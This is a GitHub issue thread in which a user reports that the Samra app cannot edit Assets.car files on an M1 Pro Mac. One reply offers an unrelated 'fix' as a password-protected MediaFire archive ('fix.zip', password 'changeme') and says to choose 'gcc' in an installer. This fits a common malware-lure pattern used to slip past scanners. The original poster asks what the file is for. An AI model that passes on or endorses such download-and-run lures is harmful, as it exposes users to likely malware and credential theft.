### ISSUE TITLE
M1Pro Failed to edit item

### ISSUE THREAD

**Issue by liyuhaolol** [NSAntoine/Samra#15]
- I installed the same software on both the MacBook Pro Intel X86 and the MacBook Pro M1 Pro ARM. I found that this software can normally edit the Assets.car installed on the X86 device.
- However, when this software is installed on the ARM device, it becomes unresponsive after selecting and editing images, with no pop-up and no error messages. It is unable to modify the Assets.car.
- I copied the Assets.car file installed on the ARM device to the X86 device for editing, and an error appeared as shown in the picture, making it impossible to edit the Assets.car file from the ARM device.
- As shown in the picture
![wrong](https://github.com/user-attachments/assets/ebf721e2-f523-442d-a6dd-bfbe3d5a3da9)
- this is the Assets.car file from the ARM device.
[Assets.zip](https://github.com/user-attachments/files/16777194/Assets.zip)

- I hope the author can fix this strange bug as soon as possible. I will also do my best to assist the author's work. Thank you for the author's efforts.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liyuhaolol** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this for? fix this issues？
